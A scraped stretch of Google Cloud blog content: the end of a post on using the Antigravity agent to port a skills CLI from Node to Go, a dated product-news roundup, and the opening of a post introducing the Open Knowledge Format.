This mapping works well. For example, the detection logic for Zed handles Linux (Flatpak), macOS, and Windows configurations dynamically in just a few lines:

code_block: <ListValue: [StructValue([('code', '"zed": {\r\n\tName: "zed",\r\n\tDisplayName: "Zed",\r\n\tSkillsDir: ".agents/skills",\r\n\tGlobalSkillsDir: filepath.Join(home, ".agents/skills"),\r\n\tDetectInstalled: func(h, c, w string) bool {\r\n\t\treturn exists(filepath.Join(c, "zed")) ||\r\n\t\t\t(zedAppDataHome != "" && exists(filepath.Join(zedAppDataHome, "Zed"))) ||\r\n\t\t\t(zedFlatpakConfigHome != "" && exists(filepath.Join(zedFlatpakConfigHome, "zed")))\r\n\t},\r\n}'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee34d3670>)])]>

Next, I noticed that the Antigravity user onboarding code was intermingled with the automated mapping. A default like this one is a personal user choice and is better suited for isolation in its own file: agy-onboarding.go:

code_block: <ListValue: [StructValue([('code', 'move default Antigravity 2 prompting to agy-onboarding.go'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4b160>)])]>

With version zero scaffolded, it was time to test.

Step 3: Enforcing a quality assurance (QA) loop

To guarantee that the Go port behaved identically to the original TypeScript CLI, we adopted a Test-Driven Development (TDD) loop. I kicked it off with this prompt:

code_block: <ListValue: [StructValue([('code', 'Apply TDD principles and https://preslav.me/2026/05/19/10-golang-error-handling-commandments/'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4bb50>)])]>

This initiated the TDD process. Rather than explicitly prompting the agent to use skills, I guided it to fetch the 3rd party best-practice blog post, which reminded the agent about relevant Agent Skills (golang-how-to, golang-testing, golang-error-handling, and golang-cli). Because Antigravity has a sandbox, it parsed these skills and automatically started executing the QA loop. And it will keep re-applying these TDD principles in the current trajectory, anytime it is about to change functional code.

Test-first frontmatter parsing

For frontmatter parsing, the agent wrote frontmatter_test.go first using Go's table-driven test pattern (which was a delightful new pattern for me to discover):

code_block: <ListValue: [StructValue([('code', 'func TestParseFrontmatter(t *testing.T) {\r\n\ttests := []struct {\r\n\t\tname string\r\n\t\traw string\r\n\t\twantData map[string]interface{}\r\n\t\twantContent string\r\n\t}{\r\n\t\t{\r\n\t\t\tname: "valid frontmatter",\r\n\t\t\traw: "---\\nname: my-skill\\n---\\n# Content\\n",\r\n\t\t\twantData: map[string]interface{}{"name": "my-skill"},\r\n\t\t\twantContent: "# Content\\n",\r\n\t\t},\r\n\t}\r\n\tfor _, tt := range tests {\r\n\t\tt.Run(tt.name, func(t *testing.T) {\r\n\t\t\tgotData, gotContent, err := ParseFrontmatter(tt.raw)\r\n\t\t\t# assert results...\r\n\t\t})\r\n\t}\r\n}'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4b040>)])]>

When Antigravity ran go test, it failed cleanly as we expected. My agent then generated frontmatter.go, implementing a linear string scanning loop that splits the document and unmarshals its YAML metadata. By using simple linear scanning instead of complex regular expressions, we hardened our tool against Regular Expression Denial of Service (ReDoS) vulnerabilities that could crash the application. Including safety as a goal (in my initial prompt) resulted in safer code, even though the original Node implementation was using regular expressions.

Grounding via error commandments

Since we're talking about error handling, I'll cover here how we aligned our error structures with Preslav Rachev's 10 Golang Error Handling Commandments. Go requires you to return error values explicitly rather than catching them as exceptions. By integrating these rules, I directed the agent to check its errors immediately at every level (if err != nil) and wrap them with contextual detail (fmt.Errorf("action: %w", err)) before it propagates them up our call stack. While doing a final review of the generated code, I realized Antigravity forgot about this best practice, so I reminded it:

code_block: <ListValue: [StructValue([('code', "shorten error messages in all files, remove 'failed to' prefixes, etc. See the 10 golang commandments"), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4bbe0>)])]>

It promptly fixed them across the codebase.

Are unit tests enough?

The short answer is No.

To ensure that the AI did not introduce subtle bugs or hallucinations during the translation process, I performed code reviews rather than blindly trusting passing test suites.

When I audited the generated tests, I realized that passing green checks alone weren't enough: We were missing tests for that long list of installation locations and the various combinations of having no agents, a single agent, or multiple agents active at the same time. Since this was a complete rewrite, I wanted end-to-end integration coverage for these journeys. To address this gap, I prompted Antigravity with a set of targeted scenarios:

code_block: <ListValue: [StructValue([('code', 'Add integration tests:\r\n1. no agents installed: verify that it installs to antigravity and outputs the agy-cli onboarding tip.\r\n2. support for all agents but one\r\n3. exactly one agent installed, including cases where the same path might be attributed to multiple agents\r\n4. support for non-parametrized agents'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4bf10>)])]>

Note: Non-parameterized agents like Claude Code or Codex define their configuration paths globally when the package loads (or via environment variables) instead of scanning the active workspace folder at runtime.

The changelist that added these tests didn't touch any production files, the logic was solid. But I didn't want to leave this to luck. If you care about a specific feature or workflow, you have to be explicit about it. Taking five minutes to verify your end-to-end coverage and defining a few solid tests protects your users from experiencing a broken release down the line.

Step 4: Parallel subagents for CLI commands

When you port a full suite of CLI commands (init, add, list, remove, find, update,...) along with their sub-options, you face a large surface area. Rather than migrating them sequentially, it might be better to parallelize our work. In our case, it was a good choice because we wanted each subagent to focus on its specific topic rather than keep in mind the entire tool, and this helped spot a few gaps.

However, subagents are not always the best choice; you should only prioritize parallel execution on voluminous, independent tasks that are clearly bounded. When done right, parallel subagents won't consume significantly more tokens than a single long-running thread, but they protect the main coordinator agent from hitting context compression limits under the weight of a massive codebase. Most simple projects do not require this level of scale. A good rule of thumb is to reserve subagents for workloads equivalent to tens of features with tens of subfeatures.

In previous steps, I ran a single agent to quickly and efficiently build an MVP. But I was not sure whether it fully ported the code. So I asked it directly:

code_block: <ListValue: [StructValue([('code', 'did you cover 100% of the original CLI? \r\nhave subagents research each option individually and each test and fill in the gaps'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4b7f0>)])]>

It turned out this was the right call. The subagents conducted an in-depth audit of the commands, catching several option gaps and missing tests that were subsequently integrated in this audit commit.

code_block: <ListValue: []>

Each subagent worked on exactly one command. They analyzed flag permutations like -g/--global and --copy, drafted table-driven unit tests, and verified their code compiled cleanly. Once they reported back, the main coordinator integrated their changes, resolved any conflicts, and validated that the entire combined project compiled successfully.

The Elephant and the Goldfish

To keep our agent focused during this migration, we used the Elephant and Goldfish metaphor, an architectural pattern documented in Google Research's Elephants, Goldfish, and the New Golden Age of Software Engineering. This relies on two distinct roles: the Elephant (the long-term coordinator session holding design rules and codebase memory) and the Goldfish (transient, clean subagents that you spawn to run a single task without background history).

While Antigravity does use automated session compression to manage its context size, you might want to actively manage your context window by maintaining your own checklists and partitioning your work to isolated, transient subagents, when less (context) is more (clarity).

Step 5: Package structure, compilation, and CI/CD

Through some back-and-forth communication, I learned how Go packages are structured and identified the limitations I needed to consider. I now had a cleanly structured and well documented package main.go that supported native installation:

code_block: <ListValue: [StructValue([('code', 'go install github.com/alexastrum/skl@latest'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4b700>)])]>

I prompted the agent to capture the implementation details and document them for future reference:

code_block: <ListValue: [StructValue([('code', 'summarize findings for humans in README.md, considerations for agents in AGENTS.md'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4b400>)])]>

To verify the build, auto-run tests, and make sure it works on other machines as well, I asked the agent to:

code_block: <ListValue: [StructValue([('code', 'make sure it builds on all supported platforms'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4b5e0>)])]>

Antigravity set up the ci.yml workflow to run a matrix build, which had a surprising dependency:

code_block: <ListValue: [StructValue([('code', 'env:\r\n FORCE_JAVASCRIPT_ACTIONS_TO_NODE24: "true" # HMMMMMM ???\r\njobs:\r\n test:\r\n strategy:\r\n matrix:\r\n os: [ubuntu-latest, macos-latest, windows-latest]\r\n# ...'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4b130>)])]>

Unexpected caveats

Paradoxically, even though we migrated from Node to Go, our GitHub pipeline still depends on Node for standard GitHub Actions helpers like actions/checkout and actions/setup-go.
The tool is completely ready to be run and compiled locally. However, if we want to distribute pre-compiled binaries to other users, we would need to configure code signing for macOS and Windows.

Since building a custom action with code signing is a complex process, it is best reserved for another time.

Step 6: Create an Agent Skill

It was time to document the process itself. To codify this workflow, we created a reusable Agent Skill.

I started by asking the agent to plan a skill creation prompt that included the most important steps:

code_block: <ListValue: [StructValue([('code', 'Review the current trajectory (including my specific prompts that generated accepted results) and lets plan to create a `/cli-to-go-migration` skill. What steps should the skill follow?'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4bc10>)])]>

I got a draft prompt which I iterated upon. After some back-and-forth, I anchored my final instructions on five core rules (though yours might be different). Here's the final prompt I used:

code_block: <ListValue: [StructValue([('code', 'Review the current trajectory (including my specific prompts that generated accepted results) and lets plan to create a `/cli-to-go-migration` skill. Rules:\r\n\r\n#### 1. Goals\r\nThe agent must start with research before proposing code. It identifies broader user goals, reviews multiple stack alternatives, and checks for prior work to lock in on one target language and research its idioms.\r\n\r\n#### 2. Setup\r\nBefore modifying any files, the agent verifies or initializes a Git repository to keep a clean history. Later, it must also report download failures directly and fail gracefully once all independent work is finished, rather than falling back to placeholders or non-terminating loops.\r\n\r\n#### 3. Importing existing knowledge\r\nIf required grounding skills (like `golang-cli` or `golang-testing`) are missing but are explicitly named in a prompt, the agent blocks execution and offers to install them automatically after asking for confirmation, rather than printing instructions for the developer to follow.\r\n\r\n#### 4. Breakpoints\r\nThe skill establishes hard halts for known AI pain points. The agent stops for human or algorithmic validation when encountering specific problems and anytime confusion sets in.\r\n\r\n#### 5. Alignment checks\r\nWhenever we see signs of misalignment, we need to set explicit rules. For example, when I noticed that the agent was over-editing some docs and missing others, I set the rule that the agent should only apply the `/humanizer` skill to human-facing files, like the `README.md` or help docs, while leaving structured developer context, like `AGENTS.md`, clean of style edits so that other agents can parse its metadata accurately.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2f4b670>)])]>

There isn't a one-size-fits-all approach, but asking the agent to create a skill and anchor it on a few guardrails is a good start. In practice, you will likely take turns polishing multiple prompts, until you feel like the agent's responses are aligned with your goals. Then you will ask for a proof read from the AI, and finally perform a human review of the SKILL.md contents.

Conclusion

Rebuilding skl in Go was a fun, educational experience that solved a personal tooling need. It worked, so I decided to document the process. Thinking through this prism, I realized that the journey itself was the reward. You grow as an engineer by codifying your architectural choices into reusable skills and personal experience; while the compiled binary is the physical proof that your process worked.

Surprisingly, the most significant shift I experienced during this migration is behavioral.

Pulling away from an IDE (integrated development environment) and using Antigravity 2.0 made it easier for me to keep a high-level view, preventing me from going in and fixing the issues that arose during the migration. Instead, it guided me to understand why the issues occurred, and learn Go-language specific details.

In a traditional IDE, the moment your assistant encounters an issue, your instinct is to grab your keyboard and debug. Operating without an editor forces you to remain the architect, steering the machine from the navigation deck rather than fighting the engine room fires yourself. That's exactly how we learn to manage agents at scale.

What’s new with Google Cloud

Fri, 12 Jun 2026 16:00:00 +0000

Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more.

Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud blog 101: Full list of topics, links, and resources.

aside_block: <ListValue: []>

Jun 8 - Jun 12

Simplify Multi-Cloud Planning with Cloud Location Finder, now Generally Available
Cloud Location Finder provides up-to-date data on public regions, zones, and Google Distributed Cloud Connected locations across Google Cloud, AWS, Azure, and OCI. You can now programmatically discover locations based on provider, proximity, territory, and carbon footprint to optimize your global infrastructure strategy for performance, compliance, and sustainability.

Get started for free today

Jun 1 - Jun 5

Modeling the physical world with BigQuery Graph
Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this post, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.
Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)
Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.

Register for the June 18 Spanish Community TechTalk

May 25 - May 29

Anthropic’s Claude Opus 4.8 is now available on Gemini Enterprise Agent Platform. As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.
API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs
Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.

Register now
Securing AI Agents: The Extended Agent Gateway Pattern
Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.

Register for the June 4 Community TechTalk
API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP
Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.

Register for the June 11 Community TechTalk

May 18 - May 22

Chinese Webinar | June 4: AI Command and Control
As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.

Register here
GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases
Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new capabilities to benchmark and debug LLM performance across these devices. Sign-up to utilize these new features in private preview today.

May 11 - May 15

Build Your AI & MCP Control Tower for Universal Governance
Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.

Register for the May 21 Community TechTalk

Apr 27 - May 1

Master Your Launch: The Apigee Production Go-Live Checklist
Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.

Register for the May 28 Community TechTalk
Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform
Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.

Register for the May 7 Community TechTalk
Fractional G4 VMs are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
- 1/2 GPU: Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.
- 1/4 GPU: Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.
- 1/8 GPU: Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.
Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI & Agentic solutions are robust, secure, and ready for the real world.

Watch the deep dive and read the developer blog to learn more.
ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available
Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
- Install from Marketplace: GoogleCloudTools.workbench-notebooks
- Contribute on GitHub: colab-enterprise-vscode

Apr 20 - Apr 24

Announcing the 2026 Google Cloud Partners of the Year
Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.

See the 2026 Partner Award winners

Apr 13 - Apr 17

We're excited to announce the Public Preview of Datastream’s metadata integration with Knowledge Catalog. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.
Upgrading Apigee OPDK to 4.53 with OS Modernization
Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition

Read the guide
Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale
Google Cloud has announced the General Availability of Cloud Run worker pools, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the Cloud Run External Metrics Autoscaler (CREMA). Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.
Apigee Model Context Protocol (MCP) now Generally Available
Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.

Explore the MCP overview

Apr 6 - Apr 10

Community TechTalk: Powering Retail Agents with ADK, UCP & Apigee X
Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.

Register for the TechTalk
Implement multimodal capabilities in your AI agents
Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see Classify multimodal data. To create a fluid conversational AI that processes audio and video streams in real time, see Enable live bidirectional multimodal streaming. To consolidate fragmented multimodal data into a searchable knowledge graph, see Multimodal GraphRAG resource orchestration.
Automate SecOps workflows with an agentic AI system
To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to orchestrate security operations workflows.

Mar 30 - Apr 3

ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts Shilpi Puri & Wely Lau for a webinar on April 30th at 11:00 AM SGT to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.

Mar 23 - Mar 27

Turn your API sprawl into an agent-ready catalog
As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.

Read the full blog post to get started.
Webinar | April 16: AI Command & Control
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.
Modernizing and Decoupling Event Ingestion with Apigee
In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.

Read the full guide.

Mar 16 - Mar 20

Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades
The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.

Explore the full range of what the assistant can do.

Mar 9 - Mar 13

Want to use Gemini to develop code and don't know where to start?
This article includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github.

Mar 2 - Mar 6

Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model. Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.

Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via Vertex AI and developers via the Gemini API in Google AI Studio.
TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee
Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.

Register for the TechTalk

Feb 23 - Feb 27

Pro-level image generation gets faster and more accessible with Nano Banana 2
Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model here.

The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud
Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.

By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy.

Learn more.
Stop typing, start interacting! The Gemini Live Agent Challenge is here. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!

Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at geminiliveagentchallenge.devpost.com

Feb 9 - Feb 13

Introducing Gemini 3.1 Pro on Google Cloud.
3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our goal to help you transform your business for the agentic future. Learn more about the model’s capabilities here. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Automate Storage Compatibility with GKE Dynamic Default Storage Classes
Managing storage across mixed-generation VM clusters in GKE just got easier. With the new Dynamic Default Storage Class, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.

Explore automated disk type selection
Community TechTalk: AI-Powered Apigee Development with strofa.io
Join the Apigee community on February 26 for a deep dive into strofa.io. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.

Register now to reserve your spot.

Jan 26 - Jan 30

Simplify API Governance with Native OpenAPI v3 Support
Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.

Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.

Accelerate API Testing with the New Open Source API Tester
Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like proxy.basepath without leaving your terminal.

Explore the API Tester guide and start testing your proxies today.
Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid
Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via kubectl, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.

Implement Kubernetes Secrets in your hybrid proxies.
See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud
Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings -> Appearance menu.

Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!
Apigee X Networking: PSC or VPC Peering?
Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.

Watch the video.

Jan 19 - Jan 23

Bridge the Gap: Excel-to-API Conversion in Apigee Portals
Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.

Learn how to build it.
Elevate your applications with Firestore’s new advanced query engine
We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.

Learn more about Firestore pipeline operations.

Introducing the Open Knowledge Format

Fri, 12 Jun 2026 13:00:00 +0000

As foundation models continue to improve, the lack of relevant context often limits what they can do, especially as they are used to build agentic systems. While these models can help you write code, summarize documents, or analyze a dataset, they still need the right information to produce accurate and actionable results.

That’s why today, we’re introducing the Open Knowledge Format (OKF), an open specification that formalizes the LLM-wiki pattern into a portable, interoperable format. This is a vendor-neutral, agent- and human-friendly standard for representing the metadata, context, and curated knowledge that modern AI systems need.

As published, OKF v0.1 represents knowledge as a directory of markdown files with YAML frontmatter, with a small set of agreed-upon conventions that let wikis written by different producers be consumed by different agents without translation.

That's it. No complex compression scheme, no new runtime, no required SDK. A bundle of OKF documents is:

Just markdown — readable in any editor, renderable on GitHub, indexable by any search tool
Just files — shippable as a tarball, hostable in any git repo, mountable on any filesystem
Just YAML frontmatter — for the small set of structured fields that need to be queryable: type, title, description, resource, tags, and timestamp

If you've used Obsidian, Notion, Hugo, or any of the LLM wiki patterns that have emerged over the past year, the shape will feel familiar. OKF formalizes the small set of conventions needed to make these patterns interoperable.

Let’s take a look at the problem that OKF can solve for your organization, how it works, how to get started with it, and what’s next.

A fragmented context landscape

